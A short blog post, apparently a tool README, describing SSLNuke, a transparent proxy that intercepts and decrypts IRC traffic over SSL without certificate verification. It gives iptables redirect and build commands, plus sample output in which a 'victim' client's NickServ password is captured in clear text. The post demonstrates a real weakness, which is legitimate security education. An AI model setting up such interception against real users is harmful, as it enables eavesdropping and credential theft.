SSLNuke - Tool For Intercepting & Decrypting Secure IRC Traffic


SSLNuke is a program designed for decrypting and intercepting "secured" but non-verified IRC traffic. It is basically a transparent proxy that decrypts SSL traffic and prints out IRC messages.

SSL without verification isn't secure at all!

Usage:

First, add a user account for SSLNuke to run as and add IP tables rules to redirect traffic to it:
# useradd -s /bin/bash -m sslnuke
# grep sslnuke /etc/passwd
sslnuke:x:1000:1000::/home/sslnuke:/bin/bash
# iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner 1000 -m tcp \
  --dport 6697 --tcp-flags FIN,SYN,RST,ACK SYN -j REDIRECT --to-ports 4444

Finally, login as SSLNuke, build, and run SSLNuke:
# su -l sslnuke
# cd sslnuke
# make
# ./sslnuke

Run an IRC client and login to your favorite IRC network using SSL, IRC messages will be printed to stdout on SSLNuke.
[*] Received connection from: 192.168.0.5:58007
[*] Opening connection to: 1.1.1.1:6697
[*] Connection Using SSL!
[*] irc.com -> AUTH (1.1.1.1): *** Looking up your hostname...
[*] irc.com -> AUTH (1.1.1.1): *** Found your hostname
[*] irc.com -> victim (1.1.1.1): *** You are connected to irc.vps-heaven.com with
                                   TLSv1.2-AES256-GCM-SHA384-256bits
[*] 192.168.0.5 -> nickserv (192.168.0.5): id hello
[*] NickServ!services@irc.com -> victim (1.1.1.1): Password accepted - you are now
                                                      recognized.




No comments

Powered by Blogger.